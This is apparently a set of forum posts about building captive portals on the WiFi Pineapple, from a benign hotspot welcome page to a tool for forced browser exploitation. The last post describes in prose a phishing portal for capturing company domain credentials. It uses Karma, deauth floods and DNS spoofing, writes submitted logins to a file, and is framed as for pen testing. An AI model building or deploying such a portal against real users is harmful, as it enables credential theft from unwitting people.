  14. Evil Portal is a UI front end for nodogsplash on the 3.x.x firmware. It makes it really simple to create a captive portal for whatever your needs are. You can do anything with it from just making someone agree to your terms of use on the pineapple to running some sort of browser exploitation that your clients are forced to visit (remember the laws where you live). Here's some media: This video goes along with a tutorial I made: click here
  15. Hi All, Making this post over here because I didn't find a thread that was Mark IV appropriate. I'm looking for feedback on anyone who's used the nodogsplash opkg (the one Darren featured in the Feb 2013 episode he did in Ireland - www.youtube.com/watch?v=_CfWaCtqtGA). I've tried to install the appropriate packages but I'm getting a kernel mismatch error in some of the iptables modules (mark IV 2.8.1 here). Nodogsplash claims to be able to launch properly and has no conflicts with uhttpd (being that that's run on 1471 now). However, it does not appear to be trapping new client requests properly, so I'm guessing it's a problem related to the iptables modules installation issue. Has anyone walked through this successfully? Not sure if there's much to be done about the iptables module kernel mismatch until an update is made to it. I'd love to eventually turn this into an easily installable infusion for the masses - fake captive portals come in handy for client-side/wireless pen testing, and near as I can tell there isn't standardized solution in the modules list yet.
  16. I've read most of the forum posts about the various ways to setup and configure a Captive Portal on the Mark IV... I'm purchasing an Elite WiFi Pineapple Mark IV Kit in a few weeks and I'd like to setup some sort of system, so when people join my Pineapple they're greeted by a nice Local Web Page explaining some details about the free hotspot project going on around the state blah blah blah. It's not for phishing or hiding scripts etc... but more for giving the information that I want to get out there. I would like for users to have the option of completely ignoring the page if they want, or reading it. There will be no authentication or any restrictions on data and available websites etc... It would be great if my created page could be the first thing people see when they open their browser or try to load Google for example, but have the ability to read(not read) and move on. Does anyone know what's going on with the Captive Portal Module, or better yet; does anyone know how I could easily go about setting this up? As always any help is greately appreciated. P.S. Oh and I'm going to say I'm praying for all you Americans out there. Terrorists suck!
  17. First off, my web dev skills are greatly rusty these days. It's been a while since I've had the chance to work on anything. Anyway, I was thinking about a way to use the MKIV for a targeted phishing attack. The Idea: A captive portal for harvesting domain credentials of a targeted company (for legitimate pen testing engagements). Using Karma (and possibly a deauth flood), clients connect to the MKIV. DNSSpoof forwards all requests to the local index.php which checks if the client has a valid session. If session is valid, it redirects the client to their requested URL. If session is NOT valid, it redirects the client to captiveportal.html where they are prompted to login with their domain credentials. Submitting the form POSTs to process.php which opens creds.txt, writes the entered credentials, builds the session, and redirects to success.html. Success page makes the client feel good and then redirects to the originally requested page. Implementation: I have attached* what I have done so far for anyone that wants to help out. I currently have a few of the pages done up. Index.php is properly redirecting to captiveportal.html, but when I submit the form I just get a blank white page for process.php. It doesn't look like it ever writes out the credentials or builds any session info. Drawing blanks on that for now. Any thoughts, feedback, code is appreciated. I'd like to eventually get this to the point that it can be wrapped up into a module/infusion for quick and easy implementation. This way, attacking companies with better wireless implementations becomes easier. You no longer have to use freeradius-wpe to capture the challenge/response and then crack. Why waste that time when you can just ask them nicely for their credentials? *It won't let me upload any of the files, so I threw it up in on github here: https://github.com/vidkun/captivePhish
×
×
  • Create New...